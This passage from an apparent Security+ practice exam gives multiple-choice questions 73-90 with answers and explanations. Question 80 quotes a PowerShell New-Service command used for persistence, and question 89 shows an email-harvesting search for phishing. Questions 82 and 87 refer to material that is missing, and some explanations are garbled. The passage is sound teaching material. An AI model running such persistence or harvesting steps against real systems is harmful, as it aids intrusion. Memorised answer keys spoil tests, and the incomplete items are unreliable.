OBJ-2.5: This is an example of an improper error handling vulnerability. A well-written application must be able to handle errors and exceptions gracefully. The main goal must be for the application not to fail and allow the attacker to execute code or perform an injection attack. One famous example of an improper error handling vulnerability is Apple’s GoTo bug, as described above. For more details on this particular vulnerability, please see CVE-2014-1266. Insecure object reference refers to when a reference to an internal implementation object, such as a file or database key, is exposed to users without any other access control. Insufficient logging and monitoring allow attackers to achieve their goals without being detected due to the lack of monitoring and timely response by defenders. The use of insecure functions occurs in the C language when legacy functions like strcpy() are used. These insecure functions can lead to buffer overflow and other exploits being successful against a program.

Question 73

Dion Training is considering moving its headquarters and data center to Florida, but they are worried about hurricanes disrupting their business operations. To mitigate this risk, Dion Training has signed a contract with a vendor located in a different state to provide hardware, software, and the procedures necessary for the company to recover quickly in the case of a catastrophic event, like a hurricane causing a power loss for up to 10 days. As the owner, Jason is a little concerned that this contract isn’t sufficient to mitigate enough of the risk since it only provides a solution for the first 10 days. Jason wonders, “what will we do if a major outage occurs, and our offices are not able to be used for 6-12 months?” Jason has hired you to help develop Dion Training’s long-term strategy for recovering from such an event. What type of plan should you create?

A. Incident response plan
B. Risk management plan
C. Disaster recovery plan
D. Business continuity plan

Answer 73

D. Business continuity plan

Explanation:
OBJ-4.4: A business continuity plan (BCP) is a plan to help ensure that business processes can continue during a time of emergency or disaster. Such emergencies or disasters might include a fire or any other case where business cannot occur under normal conditions. A disaster recovery plan is useful (and usually a piece of the large business continuity plan), but it is insufficient for the long-term strategy which is needed to support business operations during an extended outage. The key difference between a DRP and BCP is that a DRP is focused on recovering from a disaster while a BCP is focused on maintaining operations before, during, and after the disaster. Usually, a DRP is a part of an overall BCP.

Question 74

A software company is meeting with a car manufacturer to finalize discussions. In the signed document, the software company will provide the latest versions of its mapping application suite for the car manufacturer’s next generation of cars. In return, the car manufacturer will provide three specific vehicle analytics to the software company to enhance the software company’s mapping application suite. The software company can offer its enhanced mapping application to other car manufacturers but must pay the car manufacturer a royalty. Which of the following BEST describes the document used in this scenario?

A. MSA
B. SLA
C. AUP
D. MOU

Answer 74

D. MOU

Explanation:
OBJ-4.3: MOU is a memorandum of understanding. This is the most accurate description based on the choices given. A memorandum of understanding is a document that describes the broad outlines of an agreement that two or more parties have reached. MOUs communicate the mutually accepted expectations of all of the parties involved in a negotiation. While not legally binding, the MOU signals that a binding contract is imminent. A service level agreement (SLA) is a commitment between a service provider and a client for particular aspects of the service, such as quality, availability, or responsibilities. An acceptable use policy (AUP) is a set of rules applied by the owner, creator, or administrator of a network, website, or service, that restrict how the network, website, or system may be used and sets guidelines as to how it should be used. A master service agreement (MSA) is a contract reached between parties, in which the parties agree to most of the terms that will govern future transactions or future agreements.

Question 75

Dion Training installed a new router 183 days ago and it stopped working today due to a faulty power supply. The network technicians replaced the power supply and the router was returned to service within 4 hours. Which of the following terms would BEST represent the 4-hour timeframe?

A. MTTR
B. RTO
C. RPO
D. MTBF

Answer 75

A. MTTR

Explanation:
OBJ-4.1: The mean time to repair (MTTR) measures the average time it takes to repair a network device when it breaks. The mean time between failures (MTBF) measures the average time between when failures occur on a device. The recovery time objective (RTO) is the duration of time and a service level within which a business process must be restored after a disaster to avoid unacceptable consequences associated with a break in continuity. The recovery point objective (RPO) is the interval of time that might pass during a disruption before the quantity of data lost during that period exceeds the Business Continuity Plan’s maximum allowable threshold or tolerance.

Question 76

Which of the following features of homomorphic encryption allows an item to be retrieved from a service’s database without revealing which item was retrieved?

A. Secure Function Evaluation
B. Secure multi-party computation
C. Private function evaluation
D. Private information retrieval

Answer 76

D. Private information retrieval

Explanation:
OBJ-1.8: Private Information Retrieval (PIR) retrieves an item from a service in possession of a database without revealing which item is retrieved. Secure Function Evaluation (SFE) allows two parties to jointly evaluate a publicly known function without revealing their respective inputs. Private Function Evaluation (PFE) allows two parties to jointly evaluate a private function without revealing their respective inputs. Secure Multi-Party Computation creates methods for parties to jointly compute a function over their inputs while keeping those inputs private.

Question 77

A salesperson’s laptop has become unresponsive after attempting to open a PDF in their email. A cybersecurity analyst reviews the IDS and anti-virus software for any alerts or unusual behavior but finds nothing suspicious. Which of the following threats would BEST classify this scenario?

A. Zero day malware
B. Ping of death
C. RAT
D. PII Exfiltration

Answer 77

A. Zero day malware

Explanation:
OBJ-2.7: Based on the scenario provided, it appears that the laptop has become the victim of a zero-day attack. A zero-day attack is an attack that exploits a potentially serious software security weakness that the vendor or developer may be unaware of. This means that there will not be a signature available in the IDS or anti-virus definition file. Therefore, it cannot be combatted with traditional signature-based detection methods. PII (personally identifiable information) exfiltration is the unauthorized copying, transfer, or retrieval of PII data from a computer or server. A ping of death is a type of attack on a computer system that involves sending a malformed or otherwise malicious ping to a computer. A remote access Trojan (RAT) is a malware program that includes a back door for administrative control over the target computer. Based on the scenario’s information, we do not have any indications that a ping packet was sent, that PII has been exfiltrated, or that the attack now has remote control of the laptop. Since neither the IDS nor anti-virus alerted on the PDF, it is most likely a form of a zero-day attack.

Question 78

During an assessment of the POS terminals that accept credit cards, a cybersecurity analyst notices a recent Windows operating system vulnerability exists on every terminal. Since these systems are all embedded and require a manufacturer update, the analyst cannot install Microsoft’s regular patch. Which of the following options would be best to ensure the system remains protected and are compliant with the rules outlined by the PCI DSS?

A. Identify, implement and document compensating controls
B. Remove the POS terminals from the network until the vendor releases a patch
C. Replace the Windows POS terminals with standard Windows systems
D. Build a custom OS image that includes the patch

Answer 78

A. Identify, implement and document compensating controls

Explanation:
OBJ-4.2: Since the analyst cannot remediate the vulnerabilities by installing a patch, the next best action would be to implement some compensating controls. If a vulnerability exists that cannot be patched, compensating controls can mitigate the risk. Additionally, the analyst should document the current situation to achieve compliance with PCI DSS. The analyst will likely not remove the terminals from the network without affecting business operations, so this is a bad option. The analyst should not build a custom OS image with the patch since this could void the support agreement with the manufacturer and introduce additional vulnerabilities. Also, it would be difficult (or impossible) to replace the POS terminals with standard Windows systems due to the custom firmware and software utilized on these systems.

Question 79

Windows file servers commonly hold sensitive files, databases, passwords, and more. What common vulnerability is usually used against a Windows file server to expose sensitive files, databases, and passwords?

A. SQL Injection
B. CRLF Injection
C. Missing patches
D. Cross site scripting

Answer 79

C. Missing patches

Explanation:
OBJ-3.2: Missing patches are the most common vulnerability found on both Windows and Linux systems. When a security patch is released, attackers begin to reverse engineer the security patch to exploit the vulnerability. If your servers are not patched against the vulnerability, they can become victims of the exploit, and the server’s data can become compromised. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Cross-site scripting focuses on exploiting a user’s workstation, not a server. CRLF injection is a software application coding vulnerability that occurs when an attacker injects a CRLF character sequence where it is not expected. SQL injection is the placement of malicious code in SQL statements via web page input. SQL is commonly used against databases, but they are not useful when attacking file servers.

Question 80

You are working as part of a penetration testing team during an engagement. A coworker just entered “New-Service -Name “DionTrainingApp” -BinaryPathName C:\Windows\temp\WindowsTools.exe” in PowerShell on the Windows server the team exploited. What action is your coworker performing with this command?

A. To shutdown the running service on the server
B. To enumerate the running services on the server
C. To remove persistence on the server
D. To enable persistence on the server

Answer 80

D. To enable persistence on the server

Explanation:
OBJ-2.4: This scenario is using a command to add persistence to a Windows server using PowerShell. The command entered adds a new service named Dion Training App with the binary listed in the command. This will add persistence to the system by running the Dion Training App, which is just a fictional service name used in this example to hide the penetration tester’s persistence tools. This service could be named anything the penetration tester deems appropriate during the service’s installation.

Question 81

Dion Training has applied a new Group Policy to all student accounts that will lock out any account in which the student enters their password incorrectly 3 times in a row. Once the account is locked out, the student must wait 15 minutes before they can attempt to log in again. What type of attack is this mitigation strategy trying to prevent?

A. Brute force attack
B. Privilege escalation
C. Spoofing
D. On path attack

Answer 81

A. Brute force attack

Explanation:
OBJ-1.5: Since the policy will lock out the student for 15 minutes between attempts, it is a valid mitigation technique against a brute force attack. By extending the waiting period, the attacker’s brute force attempts are less effective. A brute force attack is a type of password attack where an attacker uses an application to exhaustively try every possible alphanumeric combination to crack encrypted passwords. An on-path attack is an attack where the threat actor makes an independent connection between two victims and can read, and possibly modify traffic. A privilege escalation is a practice of exploiting flaws in an operating system or other application to gain a greater level of access than was intended for the user or application. Spoofing is a type of attack that disguises a communication from an unknown source as being from a known, trusted source. Spoofing can occur using different methods, such as MAC spoofing, IP spoofing, call spoofing, and others.

Question 82

A cybersecurity analyst working at a major university is reviewing the SQL server log of completed transactions and notices the following entry:

Based on this transaction log, which of the following most likely occurred?

A. The application and the SQL database are functioning properly
B. The SQL Server has insufficient logging and monitoring
C. A student with ID#1235235 used a SQL injection to give themselves straight As
D. Someone used a SQL injection to assign straight As to the student with ID #1235235

Answer 82

D. Someone used a SQL injection to assign straight As to the student with ID #1235235

Explanation:
OBJ-2.5: Based on this transaction log entry, it appears that the ID# field was not properly validated before being passed to the SQL server. This would allow someone to conduct an SQL injection and retrieve the student’s grades and set all of this student’s grades to an ‘A’ at the same time. It is common to look for a ‘1==1’ type condition to identify an SQL injection. There are other methods to conduct an SQL injection attack that could be utilized by an attacker. If input validation is not being performed on user-entered data, an attacker can exploit any SQL language aspect and inject SQL-specific commands. This entry is suspicious and indicates that either the application or the SQL database is not functioning properly. Still, there appears to be adequate logging and monitoring based on what we can see and whether the question never indicates logging was an issue. An SQL database would not be designed to set ALL of a particular student’s grades to A’s, thus making this single entry suspicious. Most SQL statements in an SQL log will be fairly uniform and repetitive by nature when you review them. This leaves us with the question as to who person this SQL injection. Per the question choices, it could be the student with ID# 1235235 or “someone.” While it seems as if student #1235235 had the most to gain from this, without further investigation, we cannot prove that it actually was student #1235235 that performed the SQL injection. Undoubtedly, student #125235 should be a person of interest in any ensuing investigations, but additional information (i.e., whose credentials were being used, etc.) should be used before making any accusations. Therefore, the answer is that “someone” performed this SQL injection.

Question 83

Which of the following hash algorithms is most vulnerable to a birthday attack or collision?

A. SHA-1
B. Poly1305
C. RIPEEMD-160
D. MD5

Answer 83

D. MD5

Explanation:
OBJ-3.6: Message Digest Algorithm (MD5) is a one-way cryptographic function that accepts a message of any length as input and returns as output a fixed-length 128-bit hash digest value to be used for authenticating the original message. MD5 can be easily brute-forced and has a high chance of collision. Secure Hashing Algorithm (SHA-1) is a one-way cryptographic function that accepts a message of any length as input and returns as output a fixed-length 160-bit hash digest value to be used for authenticating the original message. SHA-1 is considered weak and no longer used for digital signatures, time stamps, or any application that requires collision resistance as of 2015. RACE Integrity Primitives Evaluation Message Digest (RIPEMD-160) is a one-way cryptographic function that accepts a message of any length as input and returns as output a fixed-length 160-bit hash digest value to be used for authenticating the original message. RIPEMD is used in PGP and the Bitcoin standard. Poly1305 is a cryptographic message authentication code that creates a 128-bit authenticator for any variable-length message to verify the data integrity and authenticity of a message.

Question 84

After 9 months of C++ programming, the team at Whammiedyne systems has released their new software application. Within just 2 weeks of release, though, the security team discovered multiple serious vulnerabilities in the application that must be corrected. To retrofit the source code to include the required security controls will take 2 months of labor and will cost $100,000. Which development framework should Whammiedyne use in the future to prevent this situation from occurring in other projects?

A. Agile Model
B. DevOps
C. DevSecOps
D. Waterfall Model

Answer 84

C. DevSecOps

Explanation:
OBJ-1.3: DevSecOps is a combination of software development, security operations, and systems operations and refers to the practice of integrating each discipline with the others. DevSecOps approaches are generally better postured to prevent problems like this because security is built-in during the development instead of retrofitting the program afterward. The DevOps development model incorporates IT staff but does not include security personnel. The agile software development model focuses on iterative and incremental development to account for evolving requirements and expectations. The waterfall software development model cascades the phases of the SDLC so that each phase will start only when all of the tasks identified in the previous phase are complete. A team of developers can make secure software using either the waterfall or agile model. Therefore, they are not the right answers to solve this issue.

Question 85

A facility would like to verify each individual’s identity before allowing access to its server room and data center. Additionally, the building should ensure that users do not tailgate behind other users. What solution would BEST meet these requirements?

A. Implement a biometric reader at the facility entrance and a proximity card at the data center entrance
B. Implement a security guard at the facility entrance and a keypad at the data center entrance
C. Implement a bio metric reader at the datacenter entrance and require passage through an access control vestibule
D. Implement a CCTV camera and a proximity reader at the data center entrance

Answer 85

C. Implement a bio metric reader at the datacenter entrance and require passage through an access control vestibule

Explanation:
OBJ-2.6: A biometric reader would read the employee’s fingerprints, retina, or facial features. An access control vestibule (formerly called a mantrap) is most often used in physical security to separate non-secure areas from secure areas and prevent unauthorized access. Combining these two would ensure the identity of the individual and that only one person could enter at a time.

Question 86

Dion Training is registering a new digital certificate to support SSL/TLS connections to its webserver. To create the digital certificate, Jason was required to submit a copy of the company’s articles of incorporation and business license to prove that Dion Training has legal control over the diontraining.com domain name. Which of the following digital certificate types was created in this scenario?

A. Wildcard
B. Multidomain
C. General purpose
D. Extended validation

Answer 86

D. Extended validation

Explanation:
OBJ-3.5: Extended Validation (EV) digital certificates are subject to a process that requires more rigorous checks on the subject’s legal identity and control over the domain or software being signed. A major drawback to EV certificates is that they cannot be issued for a wildcard domain. General Purpose or Domain Validation (DV) digital certificates prove the ownership of a particular domain by responding to an email to the authorized domain contact or by publishing a text record to the domain’s DNS records. A wildcard certificate contains the wildcard character (*) in its domain name field and allows the digital certificate to be used for any number of subdomains. For example, the wildcard certificate of *.diontraining.com can be used for members.diontraining.com, cart.diontraining.com, and support.diontraining.com. A multidomain certificate is a single SSL/TLS digital certificate that can be used to secure multiple, different domain names. For example, if you want to install the same certificate on diontraining.com and yourcyberpath.com, you will need to register a multidomain certificate.

Question 87

You are conducting a grep search on a log file using the following REGEX expression:
Which of the following strings would be included in the output of the search?

A. jason_dion@dion.training
B. support@diontraining.com
C. www.diontraining.com
D. jason.dion@diontraining.com

Answer 87

B. support@diontraining.com

Explanation:
OBJ-2.2: In the above REGEX, the \b parameter identifies that we are looking for whole words. The strategic use of the + operator indicates the three places where the word is broken into parts. The first part ([A-Za-z0-9%+-]” is composed of upper or lower case alphanumeric symbols “%+-.” After the first part of the word and the at sign (@) is specified, follows by another word ([A-Za-z0-9.-]), a period (.), and another purely alphabetic (non-numeric) string that is 2-6 characters in length. This finds a standard email format of something@something.com (but could be @something.co, @something.org, @something.money, or other options as long as the top-level domain is between 2 and 6 characters). The option of www.diontraining.com is wrong because it does not have an @ sign in the string. The option of jason.dion@diontraining.com is wrong because you cannot use a period before the @ symbol, only letters, numbers, and some specified symbols ( _ % + - ). The option of jason_dion@dion.training is wrong because the last word (training) is longer than 6 characters in length. As a cybersecurity analyst, you must get comfortable creating regular expressions and understanding what type of output they generate.

Question 88

A new security appliance was installed on a network as part of a managed service deployment. The vendor controls the appliance, and the IT team cannot log in or configure it. The IT team is concerned about the appliance receiving the necessary updates. Which of the following mitigations should be performed to minimize the concern for the appliance and updates?

A. Vulnerability scanning
B. Automatic updateds
C. Scan and patch the device
D. Configuration management

Answer 88

A. Vulnerability scanning

Explanation:
OBJ-2.3: The best option here is vulnerability scanning as this allows the IT team to know what risks their network is taking on and where subsequent mitigations may be possible. Configuration management, automatic updates, and patching could normally be possible solutions, but these are not viable options without gaining administrative access to the appliance. Therefore, the analyst should continue to conduct vulnerability scanning of the device to understand the risks associated with it and then make recommendations to add additional compensating controls like firewall configurations, adding a WAF, providing segmentation, and other configurations outside the appliance that could minimize the vulnerabilities it presents.

Question 89

A cybersecurity analyst reviews the logs of a proxy server and saw the following URL, https://www.google.com/search?q=*%40diontraining.com. Which of the following is true about the results of this search?

A. Returns no useful results for an attacker
B. Returns all web pages hosted at diontraining.com
C. Returns all web pages containing the text diontraining.com
D. Returns all web pages containing an email address affiliated with diontraining.com

Answer 89

D. Returns all web pages containing an email address affiliated with diontraining.com

Explanation:
OBJ-2.2: Google interprets this statement as <anything>@diontraining.com and understands that the user is searching for email addresses since %40 is the hex code for the @ symbol. The * is a wild card character meaning that any text could be substituted for the * in the query. This type of search would provide an attacker with a list of email addresses associated with diontraining.com, which could be used as part of a spear phishing campaign. To return all web pages hosted at diontraining.com, you should use the "site:" modifier in the query. To return all web pages with the text diontraining.com, enter "diontraining.com" into the Google search bar with no modifiers to return those results.</anything>

Question 90

Eduardo is reviewing the security of Dion Training’s website and is reviewing an error concerning their digital certificate. The error code states DLG_FLAGS_SEC_CERT_DATE_INVALID. Which of the following actions should Eduardo perform to fix this error?

A. Update his web browser to support modern cipher suites
B. Request a new digital cert from the cert authority
C. Request his current digital cert to be revoked and reissued
D. Update his OS to support modern cipher suites

Answer 90

B. Request a new digital cert from the cert authority

Explanation:
OBJ-3.7: This error indicates a validity date error. A validity date error occurs when a certificate is presented for use on a date that is already past the expiration date. To fix this issue, the owner of the website must request a new digital certificate to renew their identity and create a new digital certificate with an expiration date further in the future. There is no need to request a revocation in this case, since the digital certificate is already expired. Revoking a certificate can only be done on a non-expired digital certificate.